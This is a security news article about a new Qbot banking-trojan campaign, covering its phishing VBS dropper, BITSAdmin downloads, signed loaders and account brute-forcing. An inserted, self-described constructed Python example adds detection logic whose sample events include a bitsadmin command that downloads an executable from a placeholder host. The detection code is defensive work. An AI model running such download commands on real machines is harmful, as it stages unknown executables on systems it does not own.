
Shifty new variant of Qbot banking trojan spreads

An active malware campaign primarily targeting U.S. corporations with a new polymorphic variant of the Qbot banking trojan has been compromising thousands of victims around the world, researchers have reported.

The worm-like malware, whose original version is roughly a decade old, allows attackers to collect browsing activity and steal bank account credentials and other financial information. This is accomplished through a combination of techniques, including keylogging, credential and cookie exfiltration, and hooking.

Despite the campaign's focus on the U.S., victims have been observed as far as Europe, Asia and South America, according to a blog post today from Varonis.

At last report, the company had found 2,726 unique victim IP addresses, but the true number is most likely considerably larger. The U.S. is home to 1,730 of these victims, with the U.K., Germany and South Africa the next most affected nations.

Also known as Qakbot, "Qbot employs anti-analysis techniques, frequently evades detection, and uses new infection vectors to stay ahead of defenders," warn blog post authors and researchers Dolev Taler and Eric Saraga. The variant, they explain, constantly modifies its tactics, creating files and folders with random names, frequently switching command-and-control servers and even changing the malware loader whenever there is an active internet connection.

Varonis believes the new Qbot is likely spreading via a phishing operation. This theory is supported by the discovery of a zip file carrying a malicious VBS file with a .doc.vbs extension.

This VBS file determines the OS version of the victim's machine and then looks for signs of anti-virus software from various major security vendors. In a newly observed behavior, the malware uses the BITSAdmin command-line tool to fetch a downloader component that ultimately introduces the main malicious payload.

Different victims may receive different loaders depending on a hard-coded parameter found in the VBS file. But they all have one thing in common: they are each signed with a fake or stolen certificate to help evade detection.

After gaining persistence, Qbot begins to spread laterally by brute-forcing other accounts on the victim's network. "If the malware compromises a domain account, it enumerates the 'Domain Users' group and brute forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead," the blog post said.
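As an added example (constructed here, not code from the article or from Varonis's research), the following Python sketch runs two detections over constructed, simplified Windows-style event records: BITSAdmin launched by a script interpreter with a download job, as in the VBS stage described above, and a single source failing logons against many distinct accounts in a short window, which is the visible side of the account brute-forcing described in the lateral-movement step. Field names, the script-host list and the thresholds are assumptions, not values from the page.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry): process-creation and
# failed-logon records reduced to the fields the two detections need.
EVENTS = [
    {"ts": "2019-03-02T10:00:01", "type": "process", "host": "WS01",
     "parent": "wscript.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download http://example.invalid/ld.exe C:\\Users\\Public\\ld.exe"},
    {"ts": "2019-03-02T10:00:05", "type": "process", "host": "WS01",
     "parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
    # One workstation failing logons against twelve different accounts in 12 seconds
    *[{"ts": f"2019-03-02T10:05:{i:02d}", "type": "logon_failed", "host": "DC01",
       "src": "WS01", "account": f"user{i}"} for i in range(12)],
    # A lone typo-style failure from another host: should not alert
    {"ts": "2019-03-02T11:30:00", "type": "logon_failed", "host": "DC01",
     "src": "WS02", "account": "alice"},
]

# Assumed list of script interpreters that should not normally drive BITS transfers
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}

def find_script_spawned_bitsadmin(events):
    """Return (host, cmdline) for bitsadmin download jobs whose parent is a script host."""
    hits = []
    for e in events:
        if e["type"] != "process":
            continue
        if (e["image"].lower() == "bitsadmin.exe"
                and e["parent"].lower() in SCRIPT_HOSTS
                and "/transfer" in e["cmdline"].lower()):
            hits.append((e["host"], e["cmdline"]))
    return hits

def find_account_bruteforce(events, window=timedelta(minutes=5), min_accounts=10):
    """Map source -> distinct accounts when one source fails logons against
    at least min_accounts different accounts inside a sliding window."""
    by_src = defaultdict(list)
    for e in events:
        if e["type"] == "logon_failed":
            by_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e["account"]))
    alerts = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):
            accounts = {a for t, a in attempts[i:] if t - t0 <= window}
            if len(accounts) >= min_accounts:
                alerts[src] = len(accounts)
                break
    return alerts
```

Repeated failures against a single account from one source are the complementary signal for the local-account case and would be a second, similar window count.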

Further investigation of the C2 server revealed what looks to be additional malware, Varonis notes.

Bradley Barth

As director of community content at CyberRisk Alliance, Bradley Barth develops content for SC Media online conferences and events, as well as video/multimedia projects. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
